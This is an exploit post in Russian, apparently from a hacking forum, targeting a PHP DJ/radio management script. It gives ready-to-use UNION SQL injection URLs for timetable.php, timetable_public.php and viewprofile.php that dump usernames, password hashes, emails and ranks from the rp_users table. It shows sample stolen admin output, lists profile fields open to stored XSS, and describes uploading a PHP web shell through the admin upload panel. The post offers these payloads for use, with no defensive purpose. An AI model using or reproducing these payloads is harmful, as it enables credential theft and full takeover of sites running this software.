Офф.сайт: www.quickscriptz.ca.kz Префикс таблиц бд: rp_ Табличка: rp_users Клонки: djname,username,passwrd,email,rank,id Админка: http://localhost/admin/ [SQL-Injection] Сценарий timetable.php Эксплойт: Code: http://localhost/[installdir]/timetable.php?week=-1'+union+select+1,concat_ws(0x3a,djname,username,passwrd,email,rank),user(),version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+rp_users+where+id=1/* Уязвимого кода предоставить не могу так как всё закодированно в base64(кому надо тот раскодирует). Смотреть в исходнике Code: <td width='150px' align='center'>12:00 - 01:00 AM</td> <td width='150px' align='center'><b><font color='black'>DJ admin:admin:92ceae43616aa3a8cfde62e236ccc657:[email protected]:Administrator</font></b><td> Сценарий timetable_public.php Эксплойт: Code: http://localhost/[installdir]/timetable_public.php?week=-1'+union+select+1,concat_ws(0x3a,djname,username,passwrd,email,rank),user(),version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+rp_users+where+id=1/* Сценарий viewprofile.php Эксплойт: Code: http://localhost/[installdir]/viewprofile.php?dj=-1'+union+select+concat_ws(0x3a,djname,username,passwrd,email,rank),user(),version(),4,5,6,7,8,9,10,11+from+rp_users+where+id=1/* [XSS Active] В профиле уязвимые поля: Favourite Food,Pet Peeves,Sayings,About You,Avatar URL. [Шелл] Panel Configuration -> Upload Files льём наш шелл с расширением .php Шелл будет тут: http://localhost/[installdir]/uploads/shell.php (c) ~!Dok_tOR!~